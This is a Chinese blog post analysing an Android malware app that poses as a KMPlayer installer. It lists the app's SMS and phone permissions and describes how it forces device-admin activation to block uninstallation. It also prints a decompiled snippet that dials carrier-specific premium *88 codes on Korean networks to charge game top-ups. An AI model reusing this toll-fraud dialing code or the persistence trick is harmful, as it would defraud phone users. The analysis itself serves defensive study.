欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

一个android病毒分析com.example.com.android.message2

程序员文章站 2022-05-16 19:37:47
...

        工作之余,在等项目反馈,无聊之中去分析病毒代码,今天来给大家分析一款新型的手机病毒,发现腾讯和360都没有被查杀,可见这些杀毒软件只会跟在别人屁股后面。
       这款病毒伪装为KMPlayer的安装软件,如图,下载在电脑会是
一个android病毒分析com.example.com.android.message2
            
    
    博客分类: 病毒分析 android病毒分析最新韩国 

    apk包名为:com.example.com.android.message2      

    apk的权限三个比较重要的

     <uses-permission android:name="android.permission.RECEIVE_SMS" />//读取短信
     <uses-permission android:name="android.permission.READ_PHONE_STATE" />>//读取电话状态    
     <uses-permission android:name="android.permission.CALL_PHONE" /> //打电话

     apk会以短信域名的方式收到而点击下载自动安装

   
一个android病毒分析com.example.com.android.message2
            
    
    博客分类: 病毒分析 android病毒分析最新韩国 

   点安装看下一步会发生什么情况

    安装完成会我打开发现软件直接跳进要激活设备管理器


一个android病毒分析com.example.com.android.message2
            
    
    博客分类: 病毒分析 android病毒分析最新韩国 
 
 这个功能主机是把软件功能用户在软件管理变灰,不让用户删除

 

二秒钟后,这个病毒会打拨打电话给游戏冲值

 

代码如下

String str;
    if ("olleh".equals(HeartReceiver.a(this.a)))
      str = "*88" + this.b + "*";
    while (true)
    {
      Intent localIntent = new Intent("android.intent.action.CALL", Uri.fromParts("tel", str, null));
      localIntent.setFlags(268697600);
      this.c.startActivity(localIntent);
      return;
      if ("SKTelecom".equals(HeartReceiver.a(this.a)))
        str = "*88" + this.b + "*";
      else if ("LG U+".equals(HeartReceiver.a(this.a)))
        str = "*88#" + this.b;
      else
        str = "*88" + this.b + "*";

 

调用CALL来拔打电话,Sk,LG,OLL分别的韩国三大移动商。

同时还带有服务身指家号码群发短信。

 

 

 

 

  • 一个android病毒分析com.example.com.android.message2
            
    
    博客分类: 病毒分析 android病毒分析最新韩国 
  • 大小: 3 KB
  • 一个android病毒分析com.example.com.android.message2
            
    
    博客分类: 病毒分析 android病毒分析最新韩国 
  • 大小: 90.8 KB
  • 一个android病毒分析com.example.com.android.message2
            
    
    博客分类: 病毒分析 android病毒分析最新韩国 
  • 大小: 98.5 KB